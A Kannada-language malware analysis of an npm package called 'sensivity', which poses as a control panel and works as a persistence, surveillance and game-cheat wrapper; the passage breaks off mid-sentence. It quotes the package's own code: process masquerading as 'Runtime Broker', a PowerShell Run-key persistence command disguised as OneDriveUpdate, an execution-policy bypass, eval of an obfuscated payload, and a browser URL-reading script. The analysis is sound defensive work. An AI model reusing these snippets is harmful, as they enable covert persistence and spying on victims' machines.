ಟಿಎಲ್; ಡಿಆರ್
npm ಪ್ಯಾಕೇಜ್ ಸೂಕ್ಷ್ಮತೆ ತನ್ನನ್ನು "ಸೂಕ್ಷ್ಮತಾ ನಿಯಂತ್ರಣ ಫಲಕ" ಎಂದು ವಿವರಿಸುತ್ತದೆ. ವಿಂಡೋಸ್ನಲ್ಲಿ ಇದು ರಿಮೋಟ್-ಕಂಟ್ರೋಲ್ ಮತ್ತು ಕಣ್ಗಾವಲು ಸಾಧನವಾಗಿ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ.
ಇದರ ಪ್ರವೇಶ ಬಿಂದು, launcher.js, ತನ್ನದೇ ಆದ ಪ್ರಕ್ರಿಯೆಯನ್ನು ರನ್ಟೈಮ್ ಬ್ರೋಕರ್ ಎಂದು ಮರುಹೆಸರಿಸುತ್ತದೆ, ಹೆಸರಿನ ಆಟೋಸ್ಟಾರ್ಟ್ ರನ್-ಕೀ ಮೌಲ್ಯವನ್ನು ಬರೆಯುತ್ತದೆ OneDriveUpdate ಅದು ಗುಪ್ತ VBScript ಮೂಲಕ ಪ್ಯಾಕೇಜ್ ಅನ್ನು ಮರುಪ್ರಾರಂಭಿಸುತ್ತದೆ, ಪವರ್ಶೆಲ್ ಅನ್ನು ಉತ್ಪಾದಿಸುತ್ತದೆ -ExecutionPolicy Bypass, ಮತ್ತು ನಂತರ 6.87 MB ಸ್ಥಳೀಯ ಮಾಡ್ಯೂಲ್ ಜೊತೆಗೆ 171 KB ಅಸ್ಪಷ್ಟ ಸರ್ವರ್ ಪೇಲೋಡ್ ಅನ್ನು ಮೌಲ್ಯಮಾಪನ ಮಾಡುತ್ತದೆ, sens.node.
ಇದು TCP ಪೋರ್ಟ್ 3000 ನಲ್ಲಿ ಫೋನ್-ಜೋಡಿಸುವ ನಿಯಂತ್ರಣ ಫಲಕವನ್ನು ಒದಗಿಸುತ್ತದೆ ಮತ್ತು Windows UIAutomation ಮೂಲಕ ಸಕ್ರಿಯ ಬ್ರೌಸರ್ನ ವಿಳಾಸ-ಬಾರ್ URL ಅನ್ನು ಓದುತ್ತದೆ, ಒಂದು ಹಾರ್ಡ್-ಕೋಡೆಡ್ YouTube ವೀಡಿಯೊವನ್ನು ವೀಕ್ಷಿಸುತ್ತದೆ.
ಮೊದಲು ಕಪ್ಪು ಪೆಟ್ಟಿಗೆಗಳಾಗಿ ಓದಲಾಗುತ್ತಿದ್ದ ಎರಡು ಭಾಗಗಳನ್ನು ಈಗ ಪರಿಹರಿಸಲಾಗಿದೆ. ಅಸ್ಪಷ್ಟ ಸರ್ವರ್, server.obf.js, obfuscator.io RC4 ಸ್ಟ್ರಿಂಗ್-ಅರೇ ಸ್ಕೀಮ್ ಅನ್ನು ಬಳಸುತ್ತದೆ; ಅದರ ಡಿಕೋಡರ್ ಅನ್ನು ಆಫ್ಲೈನ್ನಲ್ಲಿ ಮರು-ಕಾರ್ಯಗತಗೊಳಿಸುವುದರಿಂದ (ಜಾವಾಸ್ಕ್ರಿಪ್ಟ್ ಅನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಲಾಗಿಲ್ಲ) ಒಂದೇ ಬಾಹ್ಯ ಎಂಡ್ಬಿಂದುವನ್ನು ಮರುಪಡೆಯುತ್ತದೆ — https://izopi.com/check.php — ಸಹಿ ಮಾಡಿದ ಪರವಾನಗಿ ಪ್ರತಿಕ್ರಿಯೆಗಳನ್ನು ಪರಿಶೀಲಿಸಲು ಬಳಸಲಾಗುವ ಎಂಬೆಡೆಡ್ RSA ಸಾರ್ವಜನಿಕ ಕೀಲಿಯೊಂದಿಗೆ.
ಸ್ಥಳೀಯ ಮಾಡ್ಯೂಲ್, sens.node, ಪ್ಯಾಕ್ ಮಾಡಲಾಗಿಲ್ಲ: ಇದರ ಆಮದು ಕೋಷ್ಟಕ ಮತ್ತು ಎಂಬೆಡೆಡ್ ಸ್ಟ್ರಿಂಗ್ಗಳು ಇದನ್ನು ಡೈರೆಕ್ಟ್ಎಕ್ಸ್ 11 / ಡಿಯರ್ ಇಮ್ಗುಯಿ ಇನ್-ಗೇಮ್ ಓವರ್ಲೇ ಎಂದು ಗುರುತಿಸುತ್ತವೆ, ಇದು ಐಮ್ಬಾಟ್, ಇಎಸ್ಪಿ (ವಾಲ್-ಹ್ಯಾಕ್), ಮತ್ತು ಟ್ರಿಗ್ಗರ್ಬಾಟ್ ವೈಶಿಷ್ಟ್ಯಗಳನ್ನು ಒದಗಿಸುತ್ತದೆ, ಇದು ರಿಮೋಟ್-ಪ್ರೊಸೆಸ್ ಇಂಜೆಕ್ಷನ್ ಮತ್ತು ಮೆಮೊರಿ ರೀಡ್/ರೈಟ್ಗಳಿಂದ ನಡೆಸಲ್ಪಡುತ್ತದೆ.
ಅದರೊಳಗಿನ ಸ್ಟ್ರಿಂಗ್ಗಳು GTA V / FiveM ಗೆ ಅನುಗುಣವಾಗಿ ವಾಹನ ಘಟಕಗಳು ಮತ್ತು ನಕ್ಷೆಯ ಸ್ಥಳಗಳನ್ನು ಉಲ್ಲೇಖಿಸುತ್ತವೆ. npm ಪ್ಯಾಕೇಜ್ ಆ ಸ್ಥಳೀಯ ಮಾಡ್ಯೂಲ್ನ ಸುತ್ತಲಿನ ವಿತರಣೆ ಮತ್ತು ನಿರಂತರ ಹೊದಿಕೆಯಾಗಿದೆ.
ವ್ಯಾಖ್ಯಾನಿಸುವ ಸಂಕೇತವು ಕಾರ್ಯಾಚರಣೆಗೆ ಸಂಬಂಧಿಸಿದೆ, ತಾಂತ್ರಿಕವಲ್ಲ: ಒಬ್ಬ ಅನಾಮಧೇಯ ಪ್ರಕಾಶಕನು ಒಂದೇ ಪ್ಯಾಕೇಜ್ನ ಸರಿಸುಮಾರು ಎಪ್ಪತ್ತು ಆವೃತ್ತಿಗಳನ್ನು ಬಿಡುಗಡೆ ಮಾಡಿದ್ದಾನೆ — 2.5.0 ರಿಂದ 2.5.69 — ಕೆಲವು ದಿನಗಳಲ್ಲಿ, ಪ್ರತಿಯೊಂದೂ ಒಂದೇ ಲಾಂಚರ್ ಅನ್ನು ಹೊತ್ತೊಯ್ಯುತ್ತದೆ.
ಯಾವುದೇ ಸ್ಥಾಪನೆ ಇಲ್ಲ hooksಪ್ಯಾಕೇಜ್ ಪ್ರಾರಂಭವಾದಾಗ ಮಾತ್ರ ಪೇಲೋಡ್ ಚಲಿಸುತ್ತದೆ.
ದಾಳಿ: ಅದು ಹೇಗೆ ಕೆಲಸ ಮಾಡುತ್ತದೆ
ಸೂಕ್ಷ್ಮತೆಯು ಹತ್ತು ಫೈಲ್ಗಳನ್ನು ರವಾನಿಸುತ್ತದೆ. package.json ವಿರಳವಾಗಿದೆ: ಯಾವುದೇ ರೆಪೊಸಿಟರಿ ಕ್ಷೇತ್ರವಿಲ್ಲ, ಪರವಾನಗಿ ಇಲ್ಲ, ಒಂದು ಮುಖ್ಯ ಮತ್ತು ಎರಡು ಬಿನ್ ಅಲಿಯಾಸ್ಗಳು (ಸಂವೇದನೆ, ಸೆನ್ಸ್) ಎಲ್ಲವೂ launcher.js ಅನ್ನು ಸೂಚಿಸುತ್ತವೆ, ಮತ್ತು ನೋಡ್ launcher.js ನ ಆರಂಭಿಕ ಸ್ಕ್ರಿಪ್ಟ್. ಯಾವುದೇ ಪೋಸ್ಟ್ಇನ್ಸ್ಟಾಲ್ ಅಥವಾ ಪೂರ್ವ-ಸ್ಥಾಪನೆ ಇಲ್ಲ. npm ಸ್ಥಾಪನೆಯಲ್ಲಿ ಏನೂ ಕಾರ್ಯನಿರ್ವಹಿಸುವುದಿಲ್ಲ. ಬಳಕೆದಾರರು ಪ್ಯಾಕೇಜ್ ಅನ್ನು ಪ್ರಾರಂಭಿಸಿದಾಗ ಕೆಳಗೆ ವಿವರಿಸಿದ ನಡವಳಿಕೆಯು ರನ್ ಆಗುತ್ತದೆ - ಬಿನ್ ಶಿಮ್, ಸ್ಟಾರ್ಟ್ ಸ್ಕ್ರಿಪ್ಟ್ ಅಥವಾ ರಿಕ್ವೈರ್ ಮೂಲಕ.
ಟಾರ್ಬಾಲ್ ಲಾಂಚರ್, ಅಸ್ಪಷ್ಟ ಸರ್ವರ್, ಸ್ಥಳೀಯ ಮಾಡ್ಯೂಲ್, ವಿಷುಯಲ್ ಬೇಸಿಕ್ ಸ್ಕ್ರಿಪ್ಟ್ ಮತ್ತು ನಿಯಂತ್ರಣ ಫಲಕಕ್ಕಾಗಿ ಸಾರ್ವಜನಿಕ/ವೆಬ್ ಡೈರೆಕ್ಟರಿಯನ್ನು ಹೊಂದಿರುತ್ತದೆ. launcher.js ಓದಬಹುದಾದ ಆರ್ಕೆಸ್ಟ್ರೇಟರ್ ಆಗಿದೆ; ರನ್ಟೈಮ್ನಲ್ಲಿ ಮುಖ್ಯವಾದ ತರ್ಕವು ಅದು ಲೋಡ್ ಮಾಡುವ ಎರಡು ಬ್ಲಾಬ್ಗಳಲ್ಲಿ ವಾಸಿಸುತ್ತದೆ - ಅಸ್ಪಷ್ಟ ಸರ್ವರ್ ಮತ್ತು ಸಂಕಲಿಸಿದ ಸ್ಥಳೀಯ ಮಾಡ್ಯೂಲ್, ಎರಡನ್ನೂ ಕೆಳಗೆ ಪರಿಹರಿಸಲಾಗಿದೆ.
ಪ್ರಕ್ರಿಯೆಯ ವೇಷ ಮತ್ತು ನಕಲಿ OneDrive ಅಪ್ಡೇಟರ್
ಆರಂಭಿಕ ಕಾರ್ಯಗತಗೊಳಿಸುವಿಕೆಯಲ್ಲಿ launcher.js ತನ್ನದೇ ಆದ ಪ್ರಕ್ರಿಯೆಯ ಹೆಸರನ್ನು ಎರಡು ಬಾರಿ ಹೊಂದಿಸುತ್ತದೆ:
javascript process.title = 'Runtime Broker'; ರನ್ಟೈಮ್ ಬ್ರೋಕರ್ ಒಂದು ಕಾನೂನುಬದ್ಧ ವಿಂಡೋಸ್ ಪ್ರಕ್ರಿಯೆ (RuntimeBroker.exe), ಇದು ಅಪ್ಲಿಕೇಶನ್ ಅನುಮತಿಗಳನ್ನು ಮಧ್ಯಸ್ಥಿಕೆ ವಹಿಸುತ್ತದೆ. ನೋಡ್ ಪ್ರಕ್ರಿಯೆಯನ್ನು ಅದಕ್ಕೆ ಹೊಂದಿಕೆಯಾಗುವಂತೆ ಮರುಹೆಸರಿಸುವುದು ಎಂದರೆ ಟಾಸ್ಕ್ ಮ್ಯಾನೇಜರ್ ಅನ್ನು ತ್ವರಿತವಾಗಿ ನೋಡುವುದರಿಂದ ಯಾವುದೇ ಅಸಾಮಾನ್ಯತೆಯನ್ನು ತೋರಿಸುವುದಿಲ್ಲ.
ಪರ್ಸಿಸ್ಟೆನ್ಸ್ ಅನ್ನು ನೇರ ನೋಂದಾವಣೆ API ಗಿಂತ ಪವರ್ಶೆಲ್ ಮೂಲಕ ಬರೆಯಲಾಗುತ್ತದೆ:
javascript execSync(`powershell -NoProfile -Command "$k='HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run';$n='OneDriveUpdate';$v='wscript.exe \"${vbs}\"';Set-ItemProperty -Path $k -Name $n -Value $v -Force|Out-Null"`, { stdio: 'ignore', timeout: 5000 }); ಆಟೋಸ್ಟಾರ್ಟ್ ಮೌಲ್ಯವನ್ನು OneDriveUpdate ಎಂದು ಹೆಸರಿಸಲಾಗಿದೆ, ಮತ್ತು ಅದು ನೇರವಾಗಿ ಪ್ಯಾಕೇಜ್ ಅನ್ನು ಸೂಚಿಸುವುದಿಲ್ಲ. ಇದು wscript.exe ಬಂಡಲ್ ಮಾಡಲಾದ OneDrive.Standalone.Updater.vbs ಅನ್ನು ಚಾಲನೆ ಮಾಡುವುದನ್ನು ಸೂಚಿಸುತ್ತದೆ. ಆ ಸ್ಕ್ರಿಪ್ಟ್ ನೋಡ್ ಲಾಂಚರ್.js ಅನ್ನು ಗುಪ್ತ ವಿಂಡೋದಲ್ಲಿ ಮರುಪ್ರಾರಂಭಿಸುತ್ತದೆ. ರನ್-ಕೀ ಹೆಸರು ಮತ್ತು VBScript ಫೈಲ್ ಹೆಸರು ಎರಡೂ ಮೈಕ್ರೋಸಾಫ್ಟ್ ಬ್ರ್ಯಾಂಡಿಂಗ್ ಅನ್ನು ಎರವಲು ಪಡೆದಿವೆ, ಆದ್ದರಿಂದ ಆಟೋಸ್ಟಾರ್ಟ್ ನಮೂದು ನಿಯಮಿತ OneDrive ಕಾರ್ಯವಾಗಿ ಓದುತ್ತದೆ.
ಎಕ್ಸಿಕ್ಯೂಶನ್-ಪಾಲಿಸಿ ಬೈಪಾಸ್ನೊಂದಿಗೆ ಪವರ್ಶೆಲ್
ಲಾಂಚರ್ ಪದೇ ಪದೇ ಪವರ್ಶೆಲ್ಗೆ ರವಾನೆಯಾಗುತ್ತದೆ. ಸ್ಕ್ಯಾನರ್ಗಳು ನಿರ್ಣಾಯಕವೆಂದು ಫ್ಲ್ಯಾಗ್ ಮಾಡುವ ಸಿಂಕ್ ಎಂದರೆ ಎಕ್ಸಿಕ್ಯೂಶನ್ ಪಾಲಿಸಿಯನ್ನು ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಿದ .ps1 ಅನ್ನು ಪ್ರಾರಂಭಿಸುವುದು:
javascript exec('start "Windows PowerShell" powershell -NoProfile -ExecutionPolicy Bypass -File "' + psFile + '"', { cwd: APP_DIR }); ಎಕ್ಸಿಕ್ಯೂಶನ್ ಪಾಲಿಸಿ ಬೈಪಾಸ್ ಆ ಆಹ್ವಾನಕ್ಕಾಗಿ ಸ್ಥಳೀಯ ಸ್ಕ್ರಿಪ್ಟ್-ಸಹಿ ಪರಿಶೀಲನೆಯನ್ನು ತೆಗೆದುಹಾಕುತ್ತದೆ. ರಚಿತವಾದ ಸ್ಕ್ರಿಪ್ಟ್ಗಳು ಮುಂದಿನ ವಿಭಾಗದಲ್ಲಿ ವಿವರಿಸಲಾದ ಬ್ರೌಸರ್-ಕಣ್ಗಾವಲು ಮತ್ತು ವಿಂಡೋ-ಪತ್ತೆ ಕಾರ್ಯವನ್ನು ನಿರ್ವಹಿಸುತ್ತವೆ.
ಅಸ್ಪಷ್ಟಗೊಂಡ ಸರ್ವರ್ ಮತ್ತು ಸ್ಥಳೀಯ ಮಾಡ್ಯೂಲ್
ಸೆಟಪ್ ಮಾಡಿದ ನಂತರ, launcher.js ಅದರ ನಿಜವಾದ ಪೇಲೋಡ್ ಅನ್ನು ಲೋಡ್ ಮಾಡುತ್ತದೆ ಮತ್ತು ಕಾರ್ಯಗತಗೊಳಿಸುತ್ತದೆ:
const serverCode = fs.existsSync(path.join(APP_DIR, 'server.obf.js')) ? path.join(APP_DIR, 'server.obf.js') : path.join(APP_DIR, 'server.js'); eval(fs.readFileSync(serverCode, 'utf8')); server.obf.js 171 KB _0x-array obfuscation — ಇದು ಜಾವಾಸ್ಕ್ರಿಪ್ಟ್ ಮಾದರಿಯಾಗಿದ್ದು, ಇದರಲ್ಲಿ ಪ್ರತಿಯೊಂದು ಸ್ಟ್ರಿಂಗ್ ಮತ್ತು ಐಡೆಂಟಿಫೈಯರ್ ಅನ್ನು ಸೂಚ್ಯಂಕದಿಂದ ಷಫಲ್ಡ್ ಅರೇ ಆಗಿ ಬದಲಾಯಿಸಲಾಗುತ್ತದೆ, ನಂತರ ರನ್ಟೈಮ್ನಲ್ಲಿ ಡಿ-ರೆಫರೆನ್ಸ್ ಮಾಡಲಾಗುತ್ತದೆ. ಈ ಯೋಜನೆಯು obfuscator.io ನಿಂದ ಉತ್ಪತ್ತಿಯಾಗುವ RC4 ರೂಪಾಂತರವಾಗಿದೆ: ಒಂದೇ ಡಿಕೋಡರ್ ಕಾರ್ಯವು base64-ಒಂದು ಶ್ರೇಣಿಯ ನಮೂದನ್ನು ಡಿಕೋಡ್ ಮಾಡುತ್ತದೆ ಮತ್ತು ನಂತರ ಪ್ರತಿ-ಕಾಲ್ ಕೀಲಿಯೊಂದಿಗೆ RC4-ಡೀಕ್ರಿಪ್ಟ್ ಮಾಡುತ್ತದೆ. ಆ ಡಿಕೋಡರ್ ಅನ್ನು ಪ್ರತ್ಯೇಕ ಸ್ಕ್ರಿಪ್ಟ್ನಲ್ಲಿ ಮರು-ಕಾರ್ಯಗತಗೊಳಿಸುವುದು — ಪ್ಯಾಕೇಜ್ನ ಸ್ವಂತ ಜಾವಾಸ್ಕ್ರಿಪ್ಟ್ ಅಲ್ಲ, ಹೊರತೆಗೆಯಲಾದ 821-ಎಂಟ್ರಿ ಸ್ಟ್ರಿಂಗ್ ಅರೇಯ ಮೇಲೆ ಮರು-ಕಾರ್ಯಗತಗೊಳಿಸುವಿಕೆಯನ್ನು ಮಾತ್ರ ಚಾಲನೆ ಮಾಡುವುದು — ಅದನ್ನು ಸ್ವಚ್ಛವಾಗಿ ಬಿಚ್ಚುತ್ತದೆ. ಯಾವ ಮೇಲ್ಮೈಗಳು ಸಾಧಾರಣವಾಗಿರುತ್ತವೆ ಆದರೆ decisive: ಒಂದು ಬಾಹ್ಯ URL, https://izopi.com/check.php`, LICENSE_URL ಸ್ಥಿರಾಂಕಕ್ಕೆ ನಿಯೋಜಿಸಲಾಗಿದೆ; ಎಂಬೆಡೆಡ್ RSA PUBLIC_KEY_PEM`; ಸ್ಥಳೀಯ ಫಲಕವು /api/kill, /api/qr.png, /api/trigger, /api/url, /trigger/off, ಮತ್ತು /trigger/status ಅನ್ನು ರೂಟ್ ಮಾಡುತ್ತದೆ; ಮತ್ತು child_process, crypto, ಮತ್ತು [Sensivity] sens.node ಸ್ಟ್ರಿಂಗ್ಗಳು ಲೋಡ್ ಆಗಿವೆ — ಕೊನೆಯದು ಲಾಂಚರ್ ಲೋಡ್ ಮಾಡಲಾದ ಪ್ರೋಗ್ರಾಂ ಮಾಡ್ಯೂಲ್ಗೆ ಪುನಃ ಬರೆಯುವ ನಿಖರವಾದ ಲಾಗ್ ಲೈನ್ ಆಗಿದೆ. ಎಂಡ್ಪಾಯಿಂಟ್ ಪರವಾನಗಿ ಪರಿಶೀಲನೆಯಾಗಿದೆ: ಕ್ಲೈಂಟ್ ಗುರುತಿಸುವಿಕೆಯನ್ನು ಪೋಸ್ಟ್ ಮಾಡುತ್ತದೆ (ಮಸುಕಾದ ಸರ್ವರ್ ಡಿಸ್ಕಾರ್ಡ್ ಐಡಿಯನ್ನು ಫಾರ್ಮ್ಯಾಟ್ ಮಾಡುತ್ತದೆ: %s ಸ್ಟ್ರಿಂಗ್) ಮತ್ತು RSA ಕೀ ಸರ್ವರ್ನ ಸಹಿ ಮಾಡಿದ ಪ್ರತಿಕ್ರಿಯೆಯನ್ನು ಪರಿಶೀಲಿಸುತ್ತದೆ.
sens.node 6.87 MB ಕಂಪೈಲ್ ಮಾಡಿದ ಸ್ಥಳೀಯ ಆಡ್ಆನ್ ಆಗಿದೆ, ಮತ್ತು ಇದು ಪ್ಯಾಕ್ ಮಾಡಲಾಗಿಲ್ಲ - ವಿಭಾಗದ ಎಂಟ್ರೊಪಿ 5.6–6.6 ರಷ್ಟಿರುತ್ತದೆ ಮತ್ತು PE ಆಮದು ಮತ್ತು ರಫ್ತು ಕೋಷ್ಟಕಗಳು ಹಾಗೆಯೇ ಇರುತ್ತವೆ, ಆದ್ದರಿಂದ ಅದರ ಸಾಮರ್ಥ್ಯಗಳು ನೇರವಾಗಿ ಓದಬಲ್ಲವು. ಇದು napi_register_module_v1 ಅನ್ನು ರಫ್ತು ಮಾಡುತ್ತದೆ, ದಿ standard ನೋಡ್ N-API ಪ್ರವೇಶ ಬಿಂದು, ಆದ್ದರಿಂದ eval'd ಸರ್ವರ್ ಅದನ್ನು ಸರಳ ಅಗತ್ಯದೊಂದಿಗೆ ಲೋಡ್ ಮಾಡುತ್ತದೆ. ಇದರ ಆಮದು ಕೋಷ್ಟಕವು ಟೆಲ್ ಆಗಿದೆ. KERNEL32 ನಿಂದ ಇದು OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread, K32EnumProcessModules, ಮತ್ತು Process32First/NextW ಅನ್ನು ಎಳೆಯುತ್ತದೆ — ಇದು ಮತ್ತೊಂದು ಪ್ರಕ್ರಿಯೆಯನ್ನು ಪತ್ತೆಹಚ್ಚಲು, ಅದರೊಳಗೆ ಮೆಮೊರಿಯನ್ನು ನಿಯೋಜಿಸಲು ಮತ್ತು ಆ ಮೆಮೊರಿಯನ್ನು ಓದಲು ಅಥವಾ ಬರೆಯಲು ಕ್ಯಾನೊನಿಕಲ್ ಸೆಟ್ ಆಗಿದೆ. USER32 ನಿಂದ ಇದು GetAsyncKeyState, GetKeyState, mouse_event ಮತ್ತು SetCursorPos ಅನ್ನು ಎಳೆಯುತ್ತದೆ; ಇದು ಆನ್-ಸ್ಕ್ರೀನ್ ಓವರ್ಲೇಗಾಗಿ d3d11.dll, D3DCOMPILER_43, ಮತ್ತು dwmapi ಅನ್ನು ಮತ್ತು ನೆಟ್ವರ್ಕ್ ಕರೆಗಳಿಗಾಗಿ ಪೂರ್ಣ WINHTTP ಸೆಟ್ ಅನ್ನು ಲಿಂಕ್ ಮಾಡುತ್ತದೆ. ಇದರ ಎಂಬೆಡೆಡ್ ಸ್ಟ್ರಿಂಗ್ಗಳು ವೈಶಿಷ್ಟ್ಯ ಸೆಟ್ ಅನ್ನು ಅಸ್ಪಷ್ಟತೆಯಿಲ್ಲದೆ ಹೆಸರಿಸುತ್ತವೆ: Aimbot, Aimbot FOV, Box ESP, Skeleton ESP, Triggerbot, ESP Builder, Vehicle ESP, Electron Anticheat detected, ಮತ್ತು Dear ImGui ಬ್ಯಾನರ್ Dear ImGui 1.91.3 WIP ಅನ್ನು ಸಕ್ರಿಯಗೊಳಿಸಿ. ಗ್ರೇಪ್ಸೀಡ್ ಮೆಡಿಕಲ್ ಕ್ಲಿನಿಕ್ ಮತ್ತು ವೆಹಿಕಲ್-ESP ಶಬ್ದಕೋಶದಂತಹ ಸ್ಥಳ ಮತ್ತು ಅಸ್ತಿತ್ವದ ಸ್ಟ್ರಿಂಗ್ಗಳು GTA V / FiveM ಗೆ ಅನುಗುಣವಾಗಿರುತ್ತವೆ.
ಈ ವಿಭಜನೆಯು ಉದ್ದೇಶಪೂರ್ವಕ ಪರಿಣಾಮವಾಗಿದೆ: ಓದಬಹುದಾದ launcher.js ಸ್ಕ್ಯಾನರ್ ಸುಲಭವಾಗಿ ಓದುವ ಭಾಗಗಳನ್ನು ಮಾತ್ರ ಒಯ್ಯುತ್ತದೆ - ನಿರಂತರತೆ, ವೇಷ, ಇವಾಲ್ ಕರೆ ಸ್ವತಃ - ಆದರೆ ಮಬ್ಬುಗೊಳಿಸುವಿಕೆಯು ರನ್ಟೈಮ್ ಸಂಪರ್ಕಗಳ ಒಂದು ಬಾಹ್ಯ ಹೋಸ್ಟ್ ಅನ್ನು ಮರೆಮಾಡುತ್ತದೆ ಮತ್ತು ಬೈನರಿ ಆಟದ-ಓವರ್ಲೇ ಮತ್ತು ಪ್ರಕ್ರಿಯೆ-ಇಂಜೆಕ್ಷನ್ ತರ್ಕವನ್ನು ಹಿಡಿದಿಟ್ಟುಕೊಳ್ಳುತ್ತದೆ. ಲಾಂಚರ್ ತೆಳುವಾದ, ಆಡಿಟ್ ಮಾಡಬಹುದಾದ ಶೆಲ್ ಆಗಿದೆ; ಮಬ್ಬುಗೊಳಿಸಲಾದ ಸರ್ವರ್ ನೆಟ್ವರ್ಕ್ ಗುರುತನ್ನು ಮರೆಮಾಡುತ್ತದೆ; ಸ್ಥಳೀಯ ಮಾಡ್ಯೂಲ್ ಪೇಲೋಡ್ ಆಗಿದೆ. ನಾವು ಬೈನರಿಯ ಆಮದುಗಳು ಮತ್ತು ಸ್ಟ್ರಿಂಗ್ಗಳನ್ನು ಓದಿದಂತೆ ವಿವರಿಸುತ್ತೇವೆ; ನಾವು ಅವುಗಳಿಂದ ಆಪರೇಟರ್ನ ಉದ್ದೇಶವನ್ನು ಊಹಿಸುವುದಿಲ್ಲ.
ಪೋರ್ಟ್ 3000 ನಲ್ಲಿ ಫೋನ್-ಜೋಡಣೆ ನಿಯಂತ್ರಣ ಫಲಕ
ಲಾಂಚರ್ TCP ಪೋರ್ಟ್ 3000 ನಲ್ಲಿ ಸ್ಥಳೀಯ ವೆಬ್ ಸರ್ವರ್ ಅನ್ನು ನಿರ್ವಹಿಸುತ್ತದೆ ಮತ್ತು ಅದನ್ನು ಸಿಂಗಲ್ಟನ್ ಆಗಿ ಪರಿಗಣಿಸುತ್ತದೆ. ಇದು ಅಸ್ತಿತ್ವದಲ್ಲಿರುವ ಕೇಳುಗರಿಗಾಗಿ ಪ್ರಶ್ನಿಸುತ್ತದೆ ಮತ್ತು ಬಂಧಿಸುವ ಮೊದಲು ಅದನ್ನು ತೆರವುಗೊಳಿಸುತ್ತದೆ:
javascript execSync('powershell -NoProfile -Command "$c=Get-NetTCPConnection -LocalPort 3000 -State Listen -EA 0; if($c){$c | ForEach-Object { Stop-Process -Id $_.OwningProcess -Force -EA 0 }}"', { stdio: 'ignore', timeout: 5000 }); http://localhost:3000 ನಲ್ಲಿ ಪ್ಯಾನೆಲ್ ಅನ್ನು ತಲುಪಬಹುದು, http://192.168.1.16:3000 ರ ಹಾರ್ಡ್-ಕೋಡೆಡ್ LAN ಫಾಲ್ಬ್ಯಾಕ್ URL ನೊಂದಿಗೆ. ಸಾರ್ವಜನಿಕ/ ಡೈರೆಕ್ಟರಿ ಮತ್ತು ಪ್ಯಾನೆಲ್ನ ನಡವಳಿಕೆಯು QR-ಜೋಡಣೆ ಹರಿವಿನೊಂದಿಗೆ ಸ್ಥಿರವಾಗಿರುತ್ತದೆ: ಫೋನ್ ಕೋಡ್ ಅನ್ನು ಸ್ಕ್ಯಾನ್ ಮಾಡುತ್ತದೆ ಮತ್ತು ರಿಮೋಟ್ ಆಗಿ ಹೋಸ್ಟ್ಗೆ ಬಂಧಿಸುತ್ತದೆ. ಲಾಂಚರ್ನಲ್ಲಿ ಸ್ಪಷ್ಟ ಪಠ್ಯದಲ್ಲಿ ಯಾವುದೇ ಬಾಹ್ಯ ಆಜ್ಞೆ-ಮತ್ತು-ನಿಯಂತ್ರಣ ಡೊಮೇನ್ ಗೋಚರಿಸುವುದಿಲ್ಲ - ಆದರೆ, ಮೇಲಿನ ಡಿಆಬ್ಫಸ್ಕೇಶನ್ ತೋರಿಸಿದಂತೆ, ಒಂದು ಮಸುಕಾದ ಸರ್ವರ್ನಲ್ಲಿ ಇರುತ್ತದೆ: izopi.com ಪರವಾನಗಿ ಎಂಡ್ಪಾಯಿಂಟ್. ಪ್ಯಾನೆಲ್ ಸ್ವತಃ ಸ್ಥಳೀಯ ಮತ್ತು LAN-ಸ್ಕೋಪ್ಡ್ ಆಗಿದೆ; ಹೊರಹೋಗುವ ಹೋಸ್ಟ್ ಮಾತ್ರ ಪರವಾನಗಿ ಪರಿಶೀಲನೆಯಾಗಿದೆ.
ಪ್ರತ್ಯೇಕ ಮೇಲ್ವಿಚಾರಕ/ಕೆಲಸದ ಮಾದರಿಯು ಪ್ರಕ್ರಿಯೆಯನ್ನು ಜೀವಂತವಾಗಿರಿಸುತ್ತದೆ. ಲಾಂಚರ್ SENSIVITY_SUPERVISOR ಮತ್ತು SENSIVITY_WORKER ಪರಿಸರ ಧ್ವಜಗಳೊಂದಿಗೆ ಪುನಃ ಹುಟ್ಟಿಕೊಳ್ಳುತ್ತದೆ, ಪ್ರತಿ ಮಗುವೂ ಅಡಗಿಕೊಂಡು ಚಲಿಸುತ್ತದೆ, ಆದ್ದರಿಂದ ಒಂದು ಪ್ರಕ್ರಿಯೆಯನ್ನು ಕೊಲ್ಲುವುದರಿಂದ ಅದನ್ನು ಮರುಪ್ರಾರಂಭಿಸಲು ಕಾವಲುಗಾರನಿಗೆ ಬಿಡಲಾಗುತ್ತದೆ.
ಬ್ರೌಸರ್ ಕಣ್ಗಾವಲು ಮತ್ತು YouTube ಸಿಗ್ನಲ್
ಬ್ರೌಸರ್ ಮೇಲ್ವಿಚಾರಣೆಯು ಅತ್ಯಂತ ನಿರ್ದಿಷ್ಟ ನಡವಳಿಕೆಯಾಗಿದೆ. launcher.js ಪವರ್ಶೆಲ್ ಅನ್ನು ನಿರ್ಮಿಸುತ್ತದೆ, ಅದು ಚಾಲನೆಯಲ್ಲಿರುವ ಬ್ರೌಸರ್ನ ವಿಳಾಸ ಪಟ್ಟಿಯನ್ನು ಓದಲು Windows UIAutomation ಅನ್ನು ಚಾಲನೆ ಮಾಡುತ್ತದೆ:
javascript '$pattern = $edit.GetCurrentPattern([System.Windows.Automation.ValuePattern]::Pattern)', ValuePattern ಯುಐ ಅಂಶದ ಪಠ್ಯ ವಿಷಯವನ್ನು ಹಿಂದಿರುಗಿಸುತ್ತದೆ. ಬ್ರೌಸರ್ನ ವಿಳಾಸ-ಪಟ್ಟಿಯ ಸಂಪಾದನೆ ನಿಯಂತ್ರಣಕ್ಕೆ ಅನ್ವಯಿಸಿದಾಗ, ಅದು ಬಲಿಪಶು ಪ್ರಸ್ತುತ ವೀಕ್ಷಿಸುತ್ತಿರುವ URL ಅನ್ನು ಹಿಂದಿರುಗಿಸುತ್ತದೆ - ಬ್ರೌಸರ್ ವಿಸ್ತರಣೆಯಿಲ್ಲದೆ, ಡಿಸ್ಕ್ನಲ್ಲಿರುವ ಪ್ರೊಫೈಲ್ ಅನ್ನು ಸ್ಪರ್ಶಿಸದೆ ಮತ್ತು API ಹುಕ್ ಇಲ್ಲದೆ. ರಚಿಸಲಾದ ಸ್ಕ್ರಿಪ್ಟ್ $ಬ್ರೌಸರ್ನೇಮ್ಸ್ ಪಟ್ಟಿಯನ್ನು 